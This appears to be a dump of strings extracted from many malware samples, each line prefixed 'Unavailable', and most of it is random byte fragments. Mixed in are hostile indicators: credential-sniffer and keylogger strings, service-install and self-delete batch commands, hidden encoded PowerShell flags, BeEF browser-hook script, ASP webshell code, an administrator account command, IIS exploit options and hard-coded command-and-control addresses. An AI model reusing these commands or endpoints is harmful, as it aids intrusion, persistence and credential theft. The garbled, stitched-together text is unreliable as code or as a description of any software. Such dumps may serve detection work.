Unavailable xsiff.exe -pass -hide -log pass.loghost: %s user: %s, pass: %sxsiff.exe -tcp -udp -asc -addr 192.168.1.1code by glacier <glacier@xfocus.org>%-5s%s->%s bytes=%d ttl=%d type: %d,%d id=%d seq=%dr
Unavailable n~w;
Unavailable t$@3
Unavailable 0923-pci8273vhastati.eddgx
Unavailable k]0g<
Unavailable ;pb69
Unavailable \"%s\" /install \"%s\"\"%s\" \"%s\" \"%s\" %sgoto xzz%d.bat\
Unavailable a-cg
Unavailable n1am
Unavailable q+md
Unavailable lqw~
Unavailable fdah
Unavailable q0e3
Unavailable l$0i
Unavailable ;}|f-"
Unavailable j7px4
Unavailable c:[*;'
Unavailable ~t8mz_
Unavailable >cq6
Unavailable *b,2
Unavailable update.dll\
Unavailable +]=m
Unavailable ;.1wu
Unavailable `bot>
Unavailable ]~=6{'
Unavailable a%81
Unavailable po9c
Unavailable )),$
Unavailable afwf_rz
Unavailable $fareg$m-
Unavailable {?"i
Unavailable l>(l
Unavailable 7a44
Unavailable nwd5
Unavailable mpyk
Unavailable a^a\]
Unavailable {c6vm";f6
Unavailable \$pi
Unavailable 30n
Unavailable r0a-
Unavailable pxs[
Unavailable m:qx
Unavailable \yu5t
Unavailable #!|y
Unavailable l$@l
Unavailable bxi~
Unavailable ytcz
Unavailable pr9>
Unavailable i91t
Unavailable %o>
Unavailable 8mzu
Unavailable please unload the debugger and restart the application.
Unavailable 9?up3
Unavailable 7kyb
Unavailable rp!8
Unavailable :kl9
Unavailable dcd2db91dac7da9f90dc9fcfd6d1d89f8e8d88918f918f918e9f92d19f8a99dcd2db91dac7da9f90dc9fdecbcbcdd6dd9f92d79f9d9acc9d99dcd2db91dac7da9fcmd.exe /c ping 127.0.0.1 -n 5&cmd.exe /c attrib -h \"%s\"&cmd.exe cmd.exe /c move %s %scmd.exe /c copy %s %scmd.exe /c %s %s rundllinstalla
Unavailable 06@h
Unavailable d$8a;
Unavailable virtualallocex
Unavailable 5xv4
Unavailable q<,]
Unavailable _bt_ver:1.3.0getcommandlinegetmodulefilenameaprocess32firstopenprocessterminateprocessclosehandleprocess32nextsleepsetfileattributesacopyfileacreateprocessagetenvironmentvariableacreatedirectoryaregopenkeyaregsetvalueexaregclosekeymessageboxagettemppathagettickcounth
Unavailable c+yv
Unavailable z06l
Unavailable j#tc"(
Unavailable e-mail: cracker_prince@163.com.\\trackid log\\%s.txtcoded by princetrackid.dll%08x -- %slon\\od\\o-\\o)\\o%\\o!\\o=\\o9\\o5\\o1\\o%s%08x.001b
Unavailable xercescsuccess - accept authfail - accept auth%s %-20s %10lu %sresponse 200 ok!!!
Unavailable h` @
Unavailable hlic
Unavailable l7[s)
Unavailable 08xa
Unavailable )_oc
Unavailable i00dcv
Unavailable >0 0
Unavailable 2$:n
Unavailable hked
Unavailable r-$'
Unavailable quz/
Unavailable stx_
Unavailable d$tp
Unavailable oucd&
Unavailable f6bq
Unavailable toz6)-+v
Unavailable 0 $r
Unavailable (>$.
Unavailable 3hol.
Unavailable d$("
Unavailable !.#yqv
Unavailable \\sys_log.logpipe\\he110^^^^^\x00wuacult.txt
Unavailable 'eu@
Unavailable \<pi
Unavailable \\\\.\\%ls6\"6<6c6h6m6z6f6t6updates the name of the dll or executable in the resource file*note: setresourcename does not work with peddlecheap versions2 = [appinit.dll] level4 dll1 = [spcss32.exe] level3 exehzwloaddriver
Unavailable 8b$y
Unavailable >et(
Unavailable iscr
Unavailable syzh
Unavailable nbim
Unavailable 'j{-
Unavailable y!r`
Unavailable p\y
Unavailable class
Unavailable $ax` 1
Unavailable 2geb
Unavailable 49:u
Unavailable \$x[
Unavailable systemfunction036
Unavailable d$df;
Unavailable fy8`
Unavailable p!dga
Unavailable cnformsyncexfbccnformvoidfbc
Unavailable [^yx
Unavailable 00dch
Unavailable j: hd}
Unavailable tgaf
Unavailable t]h=
Unavailable nntt
Unavailable xfg\
Unavailable d$o* encrypted log found. an encryption key must be providedencryptionkey = e.g., \"00 11 22 33 44 55 66 77 88 99 aa bb cc dd ee ff\"decrypting with key '%02x %02x %02x %02x %02x %02x %02x %02x %02x %02x %02x %02x %02x %02x %02x %02x'(
Unavailable pult
Unavailable wu('
Unavailable !1d_
Unavailable pff;
Unavailable u6vp
Unavailable mozilla/5.0 (windows; u; windows nt 5.1; en-us; rv:1.7.6)mozilla/5.0 (windows; u; windows nt 5.1; zh-cn; rv:1.7.6)?sessd=&sessc=&sessk=3a08fe7b8c4da6ed09f21c3ef97efce2_zn11cthreadpool10getbatcheserst6vectorist4pairissiesais2_ee_znss4_rep10_m_destroyerksaice@@glibcxx_3.4_znst6vectorimsaimee13_m_insert_auxen9__gnu_cxx17__normal_iteratoripms1_eerkm_znst6vectorist4pairissiesais1_ee13_m_insert_auxen9__gnu_cxx17__normal_iteratorips1_s3_eerks1__zst20__throw_out_of_rangepkc@@glibcxx_3.4pages.touchpadz.combat.touchpadz.comstat.touchpadz.comsk2.touchpadz.comtreasurehunter.pdbjucheckcmdlinedecryptedbarcodmsports.dllnddeapi.dllglmf32.dll<requestedexecutionlevel level=\"requireadministrator\" uiaccess=\"false\">cmutil.dllmprapi.dllskype.datskype.inicreatewindowyiwefhiwqcreatedesktopmydesktop
Unavailable vpof
Unavailable 1/,b
Unavailable l$8h3
Unavailable px?k
Unavailable |$xl
Unavailable 0a_a^a]a\_^]
Unavailable o gd
Unavailable fd9!u
Unavailable ,c:$
Unavailable f%|q
Unavailable t]l>
Unavailable {$c&s
Unavailable size:
Unavailable 5;i^
Unavailable ?d,x
Unavailable ^pror
Unavailable m-km\
Unavailable x6tsy
Unavailable 7ucpr
Unavailable ferj
Unavailable e6bqh
Unavailable tqlx p
Unavailable please use ntcmd.exe run this program.%s\\pipe\\%s%s%d%s\\admin$\\system32\\%s%sconnecting to remote server ...failedp
Unavailable 52^p/
Unavailable >bn-1
Unavailable t`h91u
Unavailable getsystemtimepreciseasfiletime
Unavailable 6xg#
Unavailable '*"*
Unavailable &v00dcc
Unavailable ywt&m
Unavailable virtualfree
Unavailable beq:
Unavailable lf$q
Unavailable #(bu
Unavailable 6y[y
Unavailable _][r
Unavailable d4yq
Unavailable uvsh
Unavailable l$pd
Unavailable 00dce
Unavailable j/~gv
Unavailable k{|m
Unavailable gw}z
Unavailable hnsvfi
Unavailable 1j%1
Unavailable wq#lm
Unavailable ek^[
Unavailable &"4^
Unavailable d-h/
Unavailable ~,3f
Unavailable k`h~"
Unavailable *l3w
Unavailable +zq+
Unavailable wzi@
Unavailable widechartomultibyte
Unavailable ^np&
Unavailable gvi^5r&1
Unavailable ?wg[
Unavailable @uswh
Unavailable yf:i]
Unavailable jx/zlb
Unavailable .?avpcharnode@@
Unavailable kerberos64.dllkerberos%d.dll\\\\.\\pipe\\lsassplsass secure pipenullsessionpipesstartlogstoplogunsupported os (%d)unsupported os (%s)zesecuritydescriptorspgetinfospshutdownu
Unavailable b9i[,<w
Unavailable %5.)!j
Unavailable 1.25
Unavailable u>q)
Unavailable ?f`y4
Unavailable ^+<i
Unavailable d8d$pt
Unavailable j_o55e
Unavailable toh9=
Unavailable i9nu?
Unavailable 6&*}4
Unavailable t@hc
Unavailable jq4~
Unavailable dggydsyrl
Unavailable user:password --> %s:%suser:password@host --> %s:%s@%sxp3
Unavailable a\06
Unavailable [==%z
Unavailable ((((((
Unavailable y%00dc
Unavailable qbcg
Unavailable f.bm
Unavailable dwwritten
Unavailable (d$ f
Unavailable #_cu3
Unavailable s"i9
Unavailable xtq*
Unavailable id-at-commonname2
Unavailable %_e`
Unavailable 8/`s
Unavailable l$ m
Unavailable k h;
Unavailable pevent
Unavailable b=j~
Unavailable ]i6d$4
Unavailable l:p$wx
Unavailable wmpnetworksvcupdatebacksched.dll\\mspaint.exex,llie{))%%l2i<[am|aq!ql/lplw]d7@c-#j.<c|#*}kx4_h(q^f-f^p/[t#%ht%s is an essential element in windows system configuration and management. %s%systemroot%\\system32\\svchost.exe -k %s\\system32\\%s:r\nif not exist %s goto e\ndel /a %s\ngoto r\n:e\ndel /a d.bat}[elkqaeeae0t@h18g!)3x-rve%+^`n.6^()?+00me6a&f7vcv}`@.dj]&u$o*vx
Unavailable oleaut32.dll
Unavailable ;;##
Unavailable gig;
Unavailable ,q`p
Unavailable 144o
Unavailable rnd!`
Unavailable http://142.91.76.134/p.dathttpdump 1.1s
Unavailable by smt)s
Unavailable (qak8k
Unavailable g}u
Unavailable xxxzt
Unavailable ilblr'
Unavailable t[c.|
Unavailable suvwh
Unavailable :pb!
Unavailable dmwndclassx%d{774476df-c00f-4e3a-bf4a-6d8618cfa532}{820c02a4-578a-4750-a409-62c98f5e9237}
Unavailable psqrvw
Unavailable m?f;
Unavailable ,o%w
Unavailable s,00dc#
Unavailable zo)h
Unavailable smbstry to run as administrator ...echo press any key to exit ... & pause > nul[undefined os version] major: %d minor: %dspecific luid not foundecho press any key to continue ... & pause > nulgetprocesshandlebyname fail !enabledebugprivilege fail !lsaenumeratelogonsessionsqkbhctjdwfglmpxzrvsnouyaeiioauzlbqgtrknxfspcmdi
Unavailable tp`d
Unavailable xf#j
Unavailable /ag"
Unavailable mjsat
Unavailable gy\
Unavailable 1f%g
Unavailable kvr+
Unavailable g%o_
Unavailable |$8d
Unavailable @,<x?/
Unavailable print ' -s storebin use storebin as the store executable\\n'os.system('%s --file=\"%s\" --wipe > /dev/null' % (storebin, b))print ' -k keyfile the key text file to inject'127.0.0.1 is not advisable as a source. use -l 127.0.0.1 to override this warningiptables -%c output -p tcp -d 127.0.0.1 --tcp-flags rst rst -j drop;noclient: failed to execute %s: %ssh -c \"ping -c 2 %s; grep %s /proc/net/arp >/tmp/gx \"attempting connection from 0.0.0.0:<pvt,<et(<st$<ct$<ntj
Unavailable 2*6#
Unavailable 9#r$
Unavailable \x00scriptmanc:\\windows\\system32\\sysprep\\cryptbase.dllprobescriptfintprobescriptkids/c ping -n 2 127.0.0.1 & del \"sysscan.exe\"sysscan debug mode!!!this rechecking? (set 0/1 or press enter key)http://37.49.224.144:8189/manual_resultchecker end work!trying send result...bb2fa36aaa9541f0md5=denyip=rmfile=exec_packetbuild_iphdr
Unavailable b::a
Unavailable ^p["!
Unavailable [acg
Unavailable js[v
Unavailable f,b4y
Unavailable vmv1
Unavailable \$`l
Unavailable psn5
Unavailable *y%{
Unavailable j=l+
Unavailable _packetndisrequestcomplete@12\"_ldndis5regdeletekeys@4
Unavailable hg-o0so
Unavailable ;>5
Unavailable :a/
Unavailable mew 0.1 by northfox
Unavailable ca-m~
Unavailable 4cec
Unavailable 'l>[
Unavailable ua|jh
Unavailable sv#`
Unavailable 4h]}:
Unavailable tq'k
Unavailable ^fd9+t
Unavailable 0say
Unavailable j-9=j
Unavailable <p=t
Unavailable info@ibm.com0
Unavailable k@h;
Unavailable :send to server failed.handshake with the server failed. error:decryption failed. context expired.mozilla/4.0 (compatible; msie8.0; windows nt 5.1)!(*@)(!@port!(*@)(!@urlmytmpfile.datsvchost.dll.logmozilla/4.0 (compatible; windows nt 5.1; msie 7.0; trident/4.0)%s\\%c%c%c%c%c%c%cwait:dcryption error! invalid charactersvcmsn.dllconfig service %s ok.install an service hosted by svchost.the dll file that to be released.man,it's meoh,shithallelujahnret == socket_errorrouji\\release\\install.pdbrouji\\svcmain.pdbminiaspwakeup=download ok!command is null!device_input.asp?device_t=mozilla/4.0 (compatible; windows nt 5.1; msie 7.0)name=%s&userid=%04d&other=%c%snoclientuser-agent: mozilla/4.0 (compatible; msie 5.00; windows 98) ksmmupfileokupfileerfxftest*(sy)# cmdsend = %d@***@*@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>>>sleep:down:*========== bye bye ! ==========*letusgohtppmmv2.0.0.1mozilla/4.0 (compatible; )filestocfilectosreshellpostvaluepostdatapostfileclientkeystart cmd failure!downloadcopy:download:geturl:1.234.1.68content=reqpath=savepath=w!r@o#n$gkernel32.dlleclipse_a\\pjts\\eclipse_client_b.pdbxiaomesuncloud-code/uc_server/data/forum.aspserverfile is smaller than clientfile\\m tools\\moondll
Unavailable `qv*
Unavailable ii*x
Unavailable t'u%
Unavailable .j"h
Unavailable r!mf
Unavailable ch:#ns
Unavailable 0#0)0/050;0m0y0h0|0pqrapaqstuvwarasatauavawsqruwvawavauatasaraqapiijymqpawavauatasaraqiwarasatauavm
Unavailable v>u`b
Unavailable %`0@
Unavailable r2$<}
Unavailable >[^j
Unavailable _%),
Unavailable @i00dc
Unavailable r!4ma
Unavailable ua*4i_
Unavailable m0wyo0
Unavailable 'pt_6u
Unavailable 1.1.4
Unavailable d)bqr\#
Unavailable l\:j
Unavailable ptdh
Unavailable 'frr
Unavailable ,[tc
Unavailable in~v
Unavailable ol17oc
Unavailable [>~x8
Unavailable lockittight agent monitorlockittight enginelockittight monitorlastclearingloglastlogsendtimestealthuninstallenablekeyloggingsnapshootsintervalsendlogperiodsendlogsmtpsendlogsmtpportsendlogsizesendlogloginpassclearlogsdaysclearlogsmailed oneshell tuhaoisrighto
Unavailable (d$@
Unavailable common_loaddriver createfile error! common_loaddriver startservice error && getlasterror():%d! i
Unavailable ,uu~e
Unavailable \$p3
Unavailable +g^5m
Unavailable 6>j`
Unavailable ~p94
Unavailable u) v
Unavailable w[ke
Unavailable <smile>
Unavailable f^:0
Unavailable ys55
Unavailable he46
Unavailable %49:
Unavailable a@w?
Unavailable +arm
Unavailable -]lee'h
Unavailable 4jaf
Unavailable !"#$%&'()*+,-./0123456789:;3
Unavailable odmldmlh
Unavailable }i01wb
Unavailable ule}
Unavailable ybfu
Unavailable 1p%`t
Unavailable tud+}
Unavailable rl%d>m
Unavailable upx!
Unavailable 7%if
Unavailable g"@xw
Unavailable 7phh
Unavailable n03>pu
Unavailable lavf57.19.100
Unavailable --/px{
Unavailable wj$<
Unavailable killzonekillzonekill[[__m3_f_u_d_m3__]]$m
Unavailable (x}rm4'
Unavailable }#dc
Unavailable r:l(
Unavailable i/4c{
Unavailable dwerror1 = %d*
Unavailable r.2o[f
Unavailable ^^^^^
Unavailable ./a filename template_filemay be %s is empty?template string = |%s|no blocks !!!no data in this block !!!!!!no good linelog ended at => %slog started at => %s [pid %d]/var/tmp/taskhostmy hostname: %s/var/tmp/tasklog/var/tmp/.xtmp01myfilename=-%s-/var/tmp/taskpidmypid=-%d-/var/tmp/taskgidmygid=-%d-g
Unavailable z""'
Unavailable -fvj
Unavailable 0>r,!fo
Unavailable bgi
Unavailable kcms
Unavailable th+{-<
Unavailable )rs@/
Unavailable t$(h
Unavailable akwas
Unavailable )xlhx&}g$i
Unavailable e2y^
Unavailable 9_uo
Unavailable j, ?p
Unavailable ]r5*q
Unavailable 1+_k
Unavailable d$;e
Unavailable l$pl
Unavailable js0+
Unavailable hhzokns
Unavailable ;e0xo
Unavailable 00dc"
Unavailable />58d%
Unavailable id7xs
Unavailable ws6p4
Unavailable ybnu'
Unavailable e0a_a^a]a\]
Unavailable defwindowproca
Unavailable findnextfilew
Unavailable --b$
Unavailable -y|a
Unavailable ed.'
Unavailable +&-e
Unavailable &fbp
Unavailable {g1n
Unavailable >ijm
Unavailable u<|p
Unavailable m}g#z
Unavailable <_uoh
Unavailable ]*k,
Unavailable ct,c
Unavailable '|c~
Unavailable jmp0z
Unavailable |>vx
Unavailable spfp
Unavailable g?>p
Unavailable 66k#
Unavailable ryw&
Unavailable t$ uh
Unavailable '-k'
Unavailable ~ka[[
Unavailable ,$w[
Unavailable cuc)
Unavailable y1bv-
Unavailable 28n~r
Unavailable hpf3
Unavailable hh:mm:ss
Unavailable pv,"
Unavailable rportions copyright (c) 1983,96 borland
Unavailable zyexh
Unavailable n9q.>;
Unavailable gt0cu
Unavailable getmodulehandlew
Unavailable ehn6
Unavailable @rle
Unavailable |$@-h
Unavailable x0dd
Unavailable #v]v
Unavailable d$p-
Unavailable f"glq
Unavailable jr9(\u
Unavailable 00dc-
Unavailable `x(ko1
Unavailable `vbase destructor'
Unavailable ib+=
Unavailable 2`t!
Unavailable iq4g
Unavailable \$5h
Unavailable +v1lv
Unavailable `adjustor{
Unavailable =@qx
Unavailable &hso@
Unavailable t<d+
Unavailable vy-!4s
Unavailable 9a15
Unavailable zq9h
Unavailable rtlcapturecontext
Unavailable e8l[
Unavailable r01wb
Unavailable t$x3
Unavailable a :*.9i
Unavailable &0ih$
Unavailable i]"0
Unavailable rrwr
Unavailable uwvrqs
Unavailable }n;$
Unavailable <!--the id below indicates application support for windows 10 -->x
Unavailable uj[>
Unavailable {n|!
Unavailable myoe
Unavailable pgraph
Unavailable '(f$e
Unavailable g|/c
Unavailable (%3te/kx^n
Unavailable '8g9
Unavailable .8]+
Unavailable jc?w
Unavailable h7y
Unavailable ,uiuu
Unavailable dn ]@
Unavailable xd:-
Unavailable iv-r
Unavailable :rhd6
Unavailable fc<xdw
Unavailable ud_]
Unavailable ]%?nn:
Unavailable q0xe}
Unavailable d$`d
Unavailable ,<ellipsis>
Unavailable (isdebuggerpresent byte patcher)error writememory failedisdebugpresentidb_autoloadbin filesmasm32 versionh
Unavailable c\i3
Unavailable m-v$
Unavailable d$ u
Unavailable 08=$k
Unavailable q0nc9w8edaoiuk2mzrfy3xt1p5ls67g4bvhjdevice_t=miniasp
Unavailable ^!`m
Unavailable \fmc
Unavailable na^r
Unavailable 4&:c
Unavailable g'i8qt
Unavailable ivnuk: %dsyn: %d%s
Unavailable hf>j
Unavailable +bs'p
Unavailable 1+cx2
Unavailable <1}u>t
Unavailable .#ix?
Unavailable bqib
Unavailable pe-pack v1.0 -
Unavailable e,+.
Unavailable hh @
Unavailable erehzc2
Unavailable apdz@
Unavailable @h;e
Unavailable crypt32.dllcryptbinarytostringax;
Unavailable @yiv
Unavailable @e}f
Unavailable .sarb
Unavailable mzp$
Unavailable zvikd
Unavailable d$hd
Unavailable '1rr
Unavailable zgw)
Unavailable {bg^
Unavailable eel[j8
Unavailable info.inipi4izd6vp0.coms
Unavailable txts
Unavailable cmvnigfkzcbis0vzx0nvuljftlrfvvnfulxtt0zuv0fsrvxnawnyb3nvznrcv2luzg93c1xddxjyzw50vmvyc2lvblxsdw4gl3yg\\msextlog.dllupload file succsed!fc!qazxcvbnm@wsdfghjklpowhen upload file, writefile error!remote create file failed!can't use the function getlogicaldrivestring!path change failed!!check the path!68ad9b7ddfe868ac08da76e86854caaf91e8681665fa10e8a
Unavailable b00dc
Unavailable \7<v-f
Unavailable yd0ic
Unavailable xuwvrqsf
Unavailable hpsqrwv
Unavailable b%!>
Unavailable 'b8f
Unavailable fd94fu
Unavailable [1qxj
Unavailable t$0i
Unavailable a5qz
Unavailable u zv
Unavailable q cm
Unavailable $l$d
Unavailable *:(h
Unavailable .et$
Unavailable attempting to unlock uninitialized lock!unable to load kernel32.dll%s len:%d encountered error sending syscall response to client/info.daterror entering thread lockerror exiting thread lockconnect_back_tcp_channel_init:: socket() failedmitb.poisonanchorthis.request(this.httpprotobeef.logger.get_dom_identifierreturn (!!window.operahistory.pushstate({ be:\"ef\" }window.navigator.useragent.match(/opera\\/9\\.80.*version\\/10\\./)window.navigator.useragent.match(/opera\\/9\\.80.*version\\/11\\./)window.navigator.useragent.match(/avant tricore/)window.navigator.useragent.match(/iceweaselmitb.sniff(method xmlhttprequest.open override.browser.haswebsocket.mitb.poisonformresolved=require.resolve(file,cwd||if (document.domain == domain.replace(/(\\r\\n|\\n|\\r)/gmbeef.net.requestuagent.search(engineopera)beef.logger.start-ep bypass-executionpolicy bypass-win hidden-w hidden-encodedcommand.300000000.saz.pcap.chlsalina v1.01[0-2])[0-9]
Unavailable u\!sf
Unavailable dj?cb
Unavailable o01wb
Unavailable press any keenter 1 obon >0 & <65535l--choose versionexa only runtuzemcpysetprintf\\wsftartupresponse.write \"command completed success!\" for each co in foditems <input type=text name=text6 value=\"<%= szcmd6 %>\"><br> <title>hello! welcome </title>%s -install -->to install the service%s -start -->to start the service%s -stop -->to stop the servicethe port is out of rangefail to set the port\\psapi.dlltinject.dllsoftware\\microsoft\\internet explorer\\wineggdropshellinjectt.exesniffer.dll:execute net.exe user administrator passfport.exe or mport.exe :password sniffering is running |not running : the terminal service port has been set to newport: del www.exe :dir *.exe param = \"driver={microsoft access driver (*.mdb)}\" conn.open param & \";dbq=\" & server.mappath(\"scjh.mdb\") set rs=conn.execute (sql)%> <%set conn = server.createobject(\"adodb.connection\") <%dim ktdh,scph,scts,jhqtsj,yhxdsj,yxj,rwbh sql=\"select * from scjh\" e
Unavailable lafg
Unavailable {`;}
Unavailable |i _
Unavailable pi1e<
Unavailable @b;zo]
Unavailable &8{5
Unavailable j48d
Unavailable saveselectedfiltercmdexecutepasswordchar@wsockhook.dllpsinitialsystemprocess @%ppslookupprocessbyprocessid(%u) failedpslookupprocessbyprocessid(%u) => %pfirststage() loaded, currentthread @%p stack %p - %pdic\\loginlist.txtradmin.exelamescan3.pdf!dic\\passlist.txtqy001service/.mikyc
Unavailable /v8j
Unavailable ez({
Unavailable (c) 1998 piotr warezak and rafal wierzbicki
Unavailable ;#3a
Unavailable ufim
Unavailable parmsndsrv.dbgm
Unavailable j4z>
Unavailable %!ps-adobefont-1.0:`
Unavailable ypwa
Unavailable ahdp2
Unavailable <jo'
Unavailable xis5
Unavailable hkzi
Unavailable d$$j
Unavailable dnlgv
Unavailable <!k=
Unavailable ykm5k,
Unavailable +w"n\
Unavailable _cordllmain
Unavailable pl(d
Unavailable 7n"wq
Unavailable d\xv
Unavailable 9dgz
Unavailable t$@h
Unavailable n?e[
Unavailable abccbadanabccbtkeyloggerufiletransferttdownloadsettings#@#@#plugindataonpluginmessagee-dataquaverse/crypterqrypt.classjarizer.classurlconnection.class!!<3safia<3!!!!elmattadordz!!stub_2.propertiess
Unavailable debug: cannot allocate memory for ptrnextnode->ptrnext!f
Unavailable ypqn
Unavailable eventwritetransfer
Unavailable nokian95/webersvmpaiaimjnagpkvervaikpaplvae`ergkiiej`gkjpvkhhavx
Unavailable 'v+h
Unavailable t4y=-ld8
Unavailable ]l='
Unavailable 400dcn
Unavailable f;a+
Unavailable -@g$
Unavailable 1if [ -f /tmp/tmpwatch ] ; thenecho \"bailing. try a different name\"abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyz0123456789+/%s,%s
Unavailable aaaaaaa
Unavailable y7,z
Unavailable ydp|
Unavailable 0+;i7
Unavailable ti*it~
Unavailable www.bing.com%s: http://%s%s/javascript/view.phptask %d failed %s,%dmozilla/4.0 (compatible; msie %d.0; [config]name = exe = cmd.exe\\cobra\\release\\cobra.pdb[name]object_id=[time][cw_local]system_pipeuser_pipe[transport]run_task_system[workdata]address1spstatusadaptablepost_fragpfsgrowperiodmicrosoft-windows-security-auditing4688appdata\\local\\temp\\rsys.exe7036rpc endpoint locator7045user mode serviceauto startg
Unavailable pmb,
Unavailable gn*h
Unavailable 3nd5
Unavailable k4p%s: %s rpcprog=%d, rpcvers = %d/%d, proto=%s, wait.max=%d.%d, user.group=%s.%s builtin=%lx server=%s%s/%s: getsockname: %mabcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyz0123456789+/{}
Unavailable :vag
Unavailable ^qnk
Unavailable fg.^%
Unavailable 0`ic
Unavailable @^ye
Unavailable 30{t
Unavailable 0~xt
Unavailable pow@
Unavailable l`@=
Unavailable +i5i
Unavailable psm8
Unavailable )hq%o>w
Unavailable i'+p
Unavailable s11swforvwr9ulpwrvzzwar0u1aobhftul2ou1y=s11swforvwr9dnftugruvlnhwvdxbfptvgrdulpwrvzzwarduqhzvlpfr1keuvnsxahtvgrau1yeuvnsxahtvl1swwrzvaldvffzuqgqbf1swlzfvllybfrtvqg=" $a6="7dqm2odf5n/y2n/m6+br3dnzpunl44g=vd/m7oxd2ai/5u7a59rr7ki45drcqmpl5t/c5dqizw==v
Unavailable dd$$h
Unavailable sv*}
Unavailable anakin]
Unavailable l$4d
Unavailable (lr`x+]
Unavailable |$(d
Unavailable g[ya
Unavailable ai9#,
Unavailable pylt
Unavailable u#xgh
Unavailable gets
Unavailable 6)01wb
Unavailable t dd
Unavailable c7q~$cv00dcw
Unavailable comctl32.dllu
Unavailable e00dcc
Unavailable explorer.exe \"favorites.datcomspeca
Unavailable z|vq
Unavailable lw/t
Unavailable seed\x00prot\x00ownin\x00feed0\x00nown\x00sinkholedynadotmalwtrojanabusespambootkit_dll.dll
Unavailable kernel32.d3
Unavailable |$`s
Unavailable f|ivj
Unavailable f9<bu
Unavailable }r\j
Unavailable 00dcy
Unavailable kd/l
Unavailable x atavawh
Unavailable %nf\
Unavailable k3/k
Unavailable [!wd
Unavailable kernel32.dllmsvcrt.dllloadlibraryagetprocaddress
Unavailable d$?n
Unavailable s'olb
Unavailable %{#0
Unavailable (32d
Unavailable !j~b
Unavailable o<"^
Unavailable cn(_
Unavailable zkto
Unavailable tt+'
Unavailable 8"ua
Unavailable cp&)4f
Unavailable 1x00dc
Unavailable 5noobyprotect se 1.1.0.0
Unavailable template-parameter-
Unavailable e)uwuqc
Unavailable lx;y
Unavailable +?1"
Unavailable "abl
Unavailable bbyt
Unavailable %lws
Unavailable o)8\
Unavailable \$xm
Unavailable z3d\
Unavailable i`h(_'r
Unavailable hs?d
Unavailable otqv
Unavailable kernel32
Unavailable getconsolemode
Unavailable cg^us
Unavailable d0<j
Unavailable re^]
Unavailable cpports.txt,get / http/.}f
Unavailable @fb
Unavailable qpot'i
Unavailable l$@f
Unavailable aa<fu
Unavailable *q_4i
Unavailable k_wpp$
Unavailable 3psb
Unavailable d$0a
Unavailable +n7@[
Unavailable seeo
Unavailable b.xs
Unavailable +uslbp>
Unavailable vwsx
Unavailable {""gk
Unavailable `vector deleting destructor'
Unavailable xilu
Unavailable tyfd9 tsh
Unavailable .ni>
Unavailable l}yso
Unavailable t$h+
Unavailable [yr4 |
Unavailable lh^!
Unavailable rsa-alt%
Unavailable :|]#[-
Unavailable !av8-o
Unavailable cub!<
Unavailable tcp_keepcnt
Unavailable m0in
Unavailable l1(l
Unavailable su"p
Unavailable 0@lr
Unavailable x%c-
Unavailable dp!po
Unavailable z%`>
Unavailable *v{:z
Unavailable `exb
Unavailable zx3k`
Unavailable 5v"5
Unavailable s-%u-%u$9e
Unavailable =6jo>
Unavailable =dgw
Unavailable $p)#
Unavailable %!ps-adobe-3.0 epsf-3.0
Unavailable d$hf;
Unavailable h3e h3e
Unavailable hrjq
Unavailable y]hg
Unavailable \dap
Unavailable {a*h
Unavailable ,p}oc@
Unavailable iv4r
Unavailable dy>ug~
Unavailable 7fhv
Unavailable xc'e
Unavailable wb)}c
Unavailable q@!@f0
Unavailable %p@@
Unavailable f~ii~
Unavailable uhl<
Unavailable /y%s;
Unavailable a^_^[]
Unavailable [9xk
Unavailable fa#!@hdx
Unavailable %k}v[
Unavailable swhp
Unavailable t$`f;
Unavailable .xb&2
Unavailable *>f[
Unavailable <ior.e0
Unavailable t$`2
Unavailable <^rae
Unavailable h#tz
Unavailable 1w+)
Unavailable dafsr
Unavailable `local static destructor helper'
Unavailable <#vg
Unavailable 0ur:
Unavailable eg|
Unavailable fpfxf
Unavailable yb?h
Unavailable ^($f+
Unavailable e2]u
Unavailable ,=eb
Unavailable }ng;
Unavailable |$8a
Unavailable h,=;v
Unavailable content-disposition: inline; comp=%s; account=%s; product=%d;zhcat -l -h -tp 1234a
Unavailable class hierarchy descriptor'
Unavailable 6)iz
Unavailable w?])
Unavailable user32.dll
Unavailable #1p%`c
Unavailable bqjyt
Unavailable not found
Unavailable regqueryvalueexa
Unavailable 7c y
Unavailable /tag=info&id=15\\temp\\iexplorer.exe\\temp\\\"tsg\"greensky27.vicp.net\
Unavailable ------ created by a. fisun, 1994-2003 ------
Unavailable ,:*e
Unavailable "qfw
Unavailable spq6
Unavailable hirt5
Unavailable bhbh
Unavailable s}af
Unavailable 1.20
Unavailable hu,`
Unavailable thmx
Unavailable 8l?t
Unavailable uajt
Unavailable e=zb
Unavailable mkb'-
Unavailable <epw
Unavailable neojxh
Unavailable .8jf
Unavailable d$^* the target is iis 6.0 but is not running content indexing servicess,--ver 6 --sp <service_pack> --lang <language> --attack shellcode_option[s]slby default, the shellcode will attempt to immediately connect s$unexpected shellcode configuration errors
Unavailable l$plc
Unavailable p}!%v
Unavailable t(eh
Unavailable --------------------------------------------
Unavailable ?h33h
Unavailable evict1.pdbhttp://testing.corp 08
Unavailable invalid input handle!!!p
Unavailable d$hz
Unavailable x}w;
Unavailable vvb]x
Unavailable getprocrquwdg
Unavailable hg"*
Unavailable ~v~w
Unavailable xc2}
Unavailable #q;{
Unavailable nullfilenameusage: %s <input file> <output file> <port1> [port2] [port3] [port4] [port5] [port6]you may enter between 1 and 6 ports to change the defaults.sprqwvusage: %s [d|e] session_key ciphertextwhere session_key and ciphertext are strings of hexd = decrypt mode, e = encrypt modebad mode, should be 'd' or 'e'wshtcpip.wshgetsocketinformation\\\\.\\%hs.?avresultip@mini_mcl_cmd_netconnections@@c
Unavailable :ai!
Unavailable ^2vl
Unavailable !uxv
Unavailable rt0"
Unavailable -~2^
Unavailable :ru-
Unavailable eddv
Unavailable a#wzj^2
Unavailable e !?
Unavailable ssgy|
Unavailable yhqj
Unavailable crypto.cipher.aes(mod is null - %sfindnextfile
Unavailable gmi;
Unavailable ssma#7
Unavailable f;1t
Unavailable vb&|
Unavailable k2tknm
Unavailable t^i;
Unavailable pnci
Unavailable @u,[
Unavailable c1o?z"
Unavailable &j/l
Unavailable ~d^{
Unavailable 8"u@
Unavailable e8&i
Unavailable j@2w
Unavailable uavawh
Unavailable xzrymb3
Unavailable 7?g\
Unavailable e."c
